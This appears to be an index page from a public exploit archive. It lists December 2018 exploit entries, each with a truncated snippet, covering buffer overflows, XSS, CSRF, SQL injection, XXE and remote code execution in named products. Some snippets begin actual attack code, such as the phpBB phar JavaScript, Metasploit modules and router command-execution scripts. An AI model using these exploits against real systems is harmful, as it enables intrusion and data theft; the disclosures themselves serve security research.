Rukovoditel Project Management CRM 2.3.1 - Remote Code Execution (Metasploit)

This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework require 'msf/core' require 'uri' class MetasploitModule 'Rukovoditel Project Management/CRM 2.3.1 - Authenticated Remote Code Execution', 'Description' = %q This module...

Bolt CMS < 3.6.2 - Cross-Site Scripting

Exploit Title: Bolt CMS https://github.com/rdincel1/Bolt-CMS-3.6.2---Cross-Site-Scripting/raw/master/bolt-v3.6.2.zip Affected Version: alert"Raif" Description Bolt CMS 3.6.2 allows XSS via text input click preview button as demonstrated by the Title field of a Configured and New Entry. PoC Video:...

Hotel Booking Script 3.4 - Cross-Site Request Forgery (Change Admin Password)

Exploit Title: Admin Account take over Via CSRF Google Dork: N/A Date: 17-12-2018 Exploit Author: Sainadh Jamalpur Vendor Homepage: https://www.phpjabbers.com/hotel-booking-system/ Software Link: https://demo.phpjabbers.com/1545033057422/index.php?controller=pjAdmin&action=pjActionIndex Version:...

PDF Explorer 1.5.66.2 - Buffer Overflow (SEH)

Exploit Title: PDF Explorer SEH Local Exploit Original Discovery:Gionathan "John" Reale DoS exploit Exploit Author: Achilles Date: 18-12-2018 Vendor Homepage: http://www.rttsoftware.com/ Software Link: https://www.rttsoftware.com/files/PDFExplorerTrialSetup.zip Tested Version: 1.5.66.2 Tested on:...

IBM Operational Decision Manager 8.x - XML External Entity Injection

Exploit Title: XML External Entity Injection XXE Date: 2018-12-18 Exploit Author: Mohamed M.Fouad - From SecureMisr Company Vendor Homepage: https://www-01.ibm.com/support/docview.wss?uid=ibm10744149 Version: v8.6 - v8.7 - v8.8 - v8.9 REQUIRED Tested on: Windows 10 CVE : CVE-2018-1821 POC1: Port...

Integria IMS 5.0.83 - Cross-Site Request Forgery

Exploit Title: Integria IMS 5.0.83 - Cross-Site Request Forgery Exploit Author: Javier Olmedo Website: https://hackpuntes.com Date: 2018-12-19 Google Dork: N/A Vendor: Artica ST Software Link: https://github.com/articaST/integriaims Affected Version: 5.0.83 and possibly before Patched Version:...

PassFab RAR 9.3.2 - Buffer Overflow (SEH)

Exploit Title: PassFab RAR Password Recovery SEH Local Exploit Date: 16-12-2018 Vendor Homepage:https://www.passfab.com/products/rar-password-recovery.html Software Link: https://www.passfab.com/downloads/passfab-rar-password-recovery.exe Exploit Author: Achilles Tested Version: 9.3.2 Tested on:...

LanSpy 2.0.1.159 - Local Buffer Overflow

!/usr/bin/python ------------------------------------------------------------------------------------------------------------------------------------ Exploit: LanSpy 2.0.1.159 - Local Buffer Overflow RCEPoC Date: 2018-12-16 Author: Juan Prescotto Tested Against: Win7 Pro SP1 64 bit Software...

Integria IMS 5.0.83 - 'search_string' Cross-Site Scripting

Exploit Title: Integria IMS 5.0.83 - Cross-Site Scripting Exploit Author: Javier Olmedo Website: https://hackpuntes.com Date: 2018-12-18 Google Dork: N/A Vendor: Artica ST Software Link: https://github.com/articaST/integriaims Affected Version: 5.0.83 and possibly before Patched Version: 5.0.84...

AnyBurn 4.3 - Local Buffer Overflow (PoC)

Exploit Title: AnyBurn Date: 15-12-2018 Vendor Homepage: http://www.anyburn.com/ Software Link : http://www.anyburn.com/anyburnsetup.exe Exploit Author: Achilles Tested Version: 4.3 32-bit Tested on: Windows 7 x64 Vulnerability Type: Denial of Service DoS Local Buffer Overflow Steps to Produce th...

MegaPing - Local Buffer Overflow Denial of Service

Exploit Title: MegaPing Date: 15-12-2018 Vendor Homepage: http://www.magnetosoft.com/ Software Link: http://www.magnetosoft.com/downloads/win32/megapingsetup.exe Exploit Author: Achilles Tested Version: Tested on: Windows 7 x64 Vulnerability Type: Denial of Service DoS Local Buffer Overflow Steps...

Microsoft Windows - 'jscript!JsArrayFunctionHeapSort' Out-of-Bounds Write

function f0 function f1 f2.prototype = arguments; new f2; function f2 Array.prototype.sort.callthis, f0; f11, 2, 3; !-- ========================================================= Details: JsArrayFunctionHeapSort is called when sorting an array with a provided comparison function. One of its...

SDL Web Content Manager 8.5.0 - XML External Entity Injection

Author Information Author : Ahmed Elhady Mohamed twitter : @AhmedELhady Company : Canon Security Date : 25/11/2018 Software Information Affected Software : SDL Web Content Manager Version: Build 8.5.0 Vendor: SDL Tridion Software website : https://www.sdl.com CVE Number: CVE-2018-19371 Descriptio...

Exel Password Recovery 8.2.0.0 - Local Buffer Overflow Denial of Service

Exploit Title: Excel Password Recovery Professional Date: 15-12-2018 Vendor Homepage:https://www.recoverlostpassword.com/ Software Link :https://www.recoverlostpassword.com/downloads/excelpasswordrecoveryprotrial.exe Exploit Author: Achilles Tested Version: 8.2.0.0 Tested on: Windows 7 64...

Nsauditor 3.0.28.0 - Local SEH Buffer Overflow

Exploit Title: Nsauditor Local SEH Buffer Overflow Date: 15-12-2018 Vendor Homepage:http://www.nsauditor.com Software Link: http://www.nsauditor.com/downloads/nsauditorsetup.exe Exploit Author: Achilles Tested Version: 3.0.28.0 Tested on: Windows XP SP3 1.- Run python code : Nsauditor.py 2.- Open...

MiniShare 1.4.1 - 'HEAD/POST' Remote Buffer Overflow

Not only the GET method is vulnerable to BOF CVE-2004-2271. HEAD and POST methods are also vulnerable. The difference is minimal, both are exploited in the same way. Only 1 byte difference: GET = 3, HEAD and POST = 4 length ------------------------------------------------------------------- EAX...

phpMyAdmin 4.8.4 - 'AllowArbitraryServer' Arbitrary File Read

!/usr/bin/env python coding: utf8 import socket import asyncore import asynchat import struct import random import logging import logging.handlers PORT = 3306 log = logging.getLoggername log.setLevellogging.DEBUG tmpformat = logging.handlers.WatchedFileHandler'mysql.log', 'ab'...

Google Chrome 70 - SQLite Magellan Crash (PoC)

This proof-of-concept crashes the Chrome renderer process using Tencent Blade Team's Magellan SQLite3 bug. It's based on a SQLite test case from the commit that fixed the bug. If you're using Chrome 70 or below, tap the button below to crash this page: Crash this page Your browser's user agent is...

Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution

Exploit Title: Facebook And Google Reviews System For Businesses 1.1 - Remote Code Execution Dork: N/A Date: 2018-12-14 Exploit Author: Ihsan Sencan Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559 Version: 1.1 Category: Webapps Tested on:...

Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery (Change Admin Password)

Exploit Title: Facebook And Google Reviews System For Businesses - Cross-Site Request Forgery Date: 2018-12-13 Exploit Author: Veyselxan Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559?srank=38 Version: v1 REQUIRED Tested on: Linux 1 Poof Of...

Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure

Details ================ Software: Fortify SSC Software Security Center Version: 17.10, 17.20 & 18.10 Homepage: https://www.microfocus.com Advisory report: https://github.com/alt3kx/CVE-2018-7690 CVE: CVE-2018-7690 CVSS: 6.5 Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N CWE-639 Description...

Facebook And Google Reviews System For Businesses 1.1 - SQL Injection

Exploit Title: Facebook And Google Reviews System For Businesses 1.1 - SQL Injection Dork: N/A Date: 2018-12-14 Exploit Author: Ihsan Sencan Vendor Homepage: https://codecanyon.net/item/facebook-and-google-reviews-system-for-businesses/22793559 Version: 1.1 Category: Webapps Tested on:...

Zortam MP3 Media Studio 24.15 - Local Buffer Overflow (SEH)

Exploit Title: Zortam MP3 Media Studio Version 24.15 Exploit SEH Version: 24.15 Exploit Author: Manpreet Singh Kheberi Date: December 13 2018 Download Link: https://www.zortam.com/download.html Vendor Homepage: https://www.zortam.com Tested on: Windows Xp Sp3 x64 Type: Bind shell print...

Angry IP Scanner 3.5.3 - Denial of Service (PoC)

!/usr/bin/python -- coding: cp1252 -- Exploit Title: Angry IP Scanner 3.5.3 Denial of Service PoC Author: Fernando Cruz Date: 13/12/2018 Vendor Homepage: https://angryip.org Tested Version: 3.11 Tested on Windows 10 Pro, 64-bit Steps to Produce the Crash: 1.- Run python code : python angryip.py 2...

Double Your Bitcoin Script Automatic - Authentication Bypass

Exploit Title: Double Your Bitcoin Script Automatic 2018 for $50 - Authentication Bypass Date: 2018-12-08 Exploit Author: Veyselxan Vendor Homepage: https://codeclerks.com/php-programming/1007/Double-Your-Bitcoin-Script-Automatic-2018 Version: v1 REQUIRED Tested on: Linux...

Huawei Router HG532e - Command Execution

!/bin/python ''' Author : Rebellion Github : @rebe11ion Twitter : @rebellion ''' import urllib2,requests,os,sys from requests.auth import HTTPDigestAuth DEFAULTHEADERS = "User-Agent": "Mozilla", DEFAULTTIMEOUT = 5 def fetchurlurl: global DEFAULTHEADERS, DEFAULTTIMEOUT request = urllib2.Requesturl...

Fortify Software Security Center (SSC) 17.10/17.20/18.10 - Information Disclosure (2)

Details ================ Software: Fortify SSC Software Security Center Version: 17.10, 17.20 & 18.10 Homepage: https://www.microfocus.com Advisory report: https://github.com/alt3kx/CVE-2018-7691 CVE: CVE-2018-7691 CVSS: 6.5 Medium; AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N CWE-639 Description...

Responsive FileManager 9.13.4 - Multiple Vulnerabilities

Responsive FileManager 9.13.4 - Multiple Vulnerabilities Date: December 12, 2018 Author: farisv Vendor Homepage: https://www.responsivefilemanager.com/ Vulnerable Package Link: https://github.com/trippo/ResponsiveFilemanager/releases/download/v9.13.4/responsivefilemanager.zip Responsive FileManag...

Safari - Proxy Object Type Confusion (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Safari Proxy Object Type Confusion', 'Description' = %q This module exploits a type confusion bug in the Javascript Proxy object in WebKit. The D...

UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service (PoC)

Exploit Title: UltraISO 9.7.1.3519 - 'Output FileName' Denial of Service PoC and Pointer to next SEH and SE handler records overwrite Discovery by: Francisco Ramirez Discovery Date: 2018-12-14 Vendor Homepage: https://www.ultraiso.com/ Software Link : https://www.ultraiso.com/download.html Tested...

Cisco RV110W - Password Disclosure / Command Execution

!/usr/bin/env python2 Cisco RV110W Password Disclosure and OS Command Execute. Tested on version: 1.1.0.9 maybe useable on 1.2.0.9 and later. Exploit Title: Cisco RV110W Password Disclosure and OS Command Execute Date: 2018-08 Exploit Author: RySh Vendor Homepage: https://www.cisco.com/ Version:...

Linux - 'userfaultfd' Bypasses tmpfs File Permissions

Using the userfaultfd API, it is possible to first register a userfaultfd region for any VMA that fulfills vmacanuserfault: It must be an anonymous VMA -vmops==NULL, a hugetlb VMA VMHUGETLB, or a shmem VMA -vmops==shmemvmops. This means that it is, for example, possible to register userfaulfd...

CyberLink LabelPrint 2.5 - Stack Buffer Overflow (Metasploit)

This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule "CyberLink LabelPrint 2.5 Stack Buffer Overflow", 'Description' = %q This module exploits a stack buffer overflow in CyberLink LabelPrint 2.5 and...

WebKit JIT - Int32/Double Arrays can have Proxy Objects in the Prototype Chains

didBecomePrototype; if structurevm-hasMonoProto DeferredStructureTransitionWatchpointFire deferredvm, structurevm; Structure newStructure = Structure::changePrototypeTransitionvm, structurevm, prototype, deferred; setStructurevm, newStructure; else putDirectvm, knownPolyProtoOffset, prototype; if...

phpBB 3.2.3 - Remote Code Execution

// All greets goes to RIPS Tech // Run this JS on Attachment Settings ACP page var pluploadsalt = ''; var formtoken = ''; var creationtime = ''; var filepath = 'phar://./../files/plupload/$saltaaae9cba5fdadb1f0c384934cd20d11czip.part'; // md5'evil.zip' = aaae9cba5fdadb1f0c384934cd20d11czip // you...

PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion

Exploit Author: bzyo CVE: CVE-2018-19936 Twitter: @bzyo Exploit Title: PrinterOn Enterprise 4.1.4 - Arbitrary File Deletion Date: 12-07-18 Vulnerable Software: PrinterOn Enterprise 4.1.4 Vendor Homepage: https://www.printeron.com/ Version: 4.1.4 Tested On...

TP-Link wireless router Archer C1200 - Cross-Site Scripting

Unauthenticated + Author: Usman Saeed usman at xc0re.net + Affected Version: Firmware version: 1.13 Build 2018/01/24 rel.52299 EU · Impact: Client side attacks are very common and are the source of maximum number of user compromises. With this attack, the threat actor can steal cookies, redirect...

McAfee True Key - McAfee.TrueKey.Service Privilege Escalation

McAfee True Key: Multiple Issues with McAfee.TrueKey.Service Implementation Platform: Version 5.1.173.1 on Windows 10 1809. Class: Elevation of Privilege Summary: There are multiple issues in the implementation of the McAfee.TrueKey.Service which can result in privilege escalation through executi...

Alumni Tracer SMS Notification - SQL Injection / Cross-Site Request Forgery

Exploit Title: Alumni Tracer SMS Notification - SQL Injection / Cross-Site Request Forgery Add/Update Admin Dork: N/A Date: 2018-12-06 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.sourcecodester.com/php/12825/alumni-tracer-sms-notification-using-phpmysqli.html Software Link:...

ZTE ZXHN H168N - Improper Access Restrictions

POC: CVE-2018-7357 and CVE-2018-7358 Disclaimer: This POC is for Educational Purposes , I would Not be responsible for any misuse of the information mentioned in this blog post + Unauthenticated + Author: Usman Saeed usman at xc0re.net + Protocol: UPnP + Affected Harware/Software: Model name: ZXH...

Tourism Website Blog - Remote Code Execution / SQL Injection

Exploit Title: Tourism Website Blog - Remote Code Execution / SQL Injection Dork: N/A Date: 2018-12-06 Exploit Author: Ihsan Sencan Vendor Homepage: https://www.sourcecodester.com/php/12819/tourism-website-blog-faces-negros-web-application.html Software Link:...

XNU - POSIX Shared Memory Mappings have Incorrect Maximum Protection

When the mmap syscall is invoked on a POSIX shared memory segment DTYPEPSXSHM, pshmmmap maps the shared memory segment's pages into the address space of the calling process. It does this with the following code: int prot = uap-prot; ... if prot & PROTWRITE && fp-fflag & FWRITE == 0 returnEPERM;...

Huawei B315s-22 - Information Leak

Product Family: LTE Model B315s – 22 Firmware version: 21.318.01.00.26 Author: Usman Saeed usman at xc0re.net 1. Unauthenticated access to sensitive files: It was observed that the web application running on the router, allows unauthenticated access to sensitive files on the web server. POC: By...

DomainMOD 4.11.01 - Cross-Site Scripting

Exploit Title: DomainMOD 4.11.01 - Cross-Site Scripting Date: 2018-11-22 Exploit Author: Mohammed Abdul Raheem Vendor Homepage: domainmod https://domainmod.org/ Software Link: domainmod https://github.com/DomainMod/DomainMod Version: v4.09.03 to v4.11.01 CVE : CVE-2018-19913 A Stored Cross-site...

SmartFTP Client 9.0.2623.0 - Denial of Service (PoC)

-- coding: utf-8 -- Exploit Title: SmartFTP 9.0 Build 2623 - Denial of Service PoC Date: 06/12/2018 Exploit Author: Alejandra Sánchez Vendor Homepage: https://www.smartftp.com/en-us/ Software Link: https://www.smartftp.com/get/SFTPMSI64.exe Version: 9.0.2623.0 Tested on: Windows Server 2016 x64/...

GNU inetutils < 1.9.4 - 'telnet.c' Multiple Overflows (PoC)

GNU inetutils = 1.9.4 telnet.c multiple overflows ================================================== GNU inetutils is vulnerable to a stack overflow vulnerability in the client-side environment variable handling which can be exploited to escape restricted shells on embedded devices. Most modern...

WordPress Plugin AutoSuggest 0.24 - 'wpas_keys' SQL Injection

Exploit Title: WP AutoSuggest 0.24 - SQL Injection Date: 01-12-2018 Software Link: https://wordpress.org/plugins/wp-autosuggest/ Exploit Author: Kaimi Website: https://kaimi.io Version: 0.24 Category: webapps SQL Injection File: autosuggest.php Vulnerable code: if isset$GET'wpaskeys' $wpaskeys =...

ThinkPHP 5.0.23/5.1.31 - Remote Code Execution

Exploit Title: ThinkPHP 5.x v5.0.23,v5.1.31 Remote Code Execution Date: 2018-12-11 Exploit Author: VulnSpy Vendor Homepage: https://thinkphp.cn Software Link: https://github.com/top-think/framework/ Version: v5.x below v5.0.23,v5.1.31 CVE: N/A Exploit...

Adobe ColdFusion 2018 - Arbitrary File Upload

Exploit Title: Unrestricted file upload in Adobe ColdFusion 2018 Google Dork: ext:cfm Date: 10-12-2018 Exploit Author: Pete Freitag of Foundeo Reversed: Vahagn vah13 Vardanian Vendor Homepage: adobe.com Version: 2018 Tested on: Adobe ColdFusion 2018 CVE : CVE-2018-15961 Comment: September 28, 201...

HotelDruid 2.3.0 - 'id_utente_mod' SQL Injection

Exploit Title: SQL Injection in HotelDruid version 2.3 Google Dork: N/A Date: 9-12-2018 Exploit Author: Sainadh Jamalpur Vendor Homepage: http://www.hoteldruid.com Software Link: https://sourceforge.net/projects/hoteldruid/ Version: 2.3 REQUIRED Tested on: Windows x64/ Kali linux x64 CVE : N/A...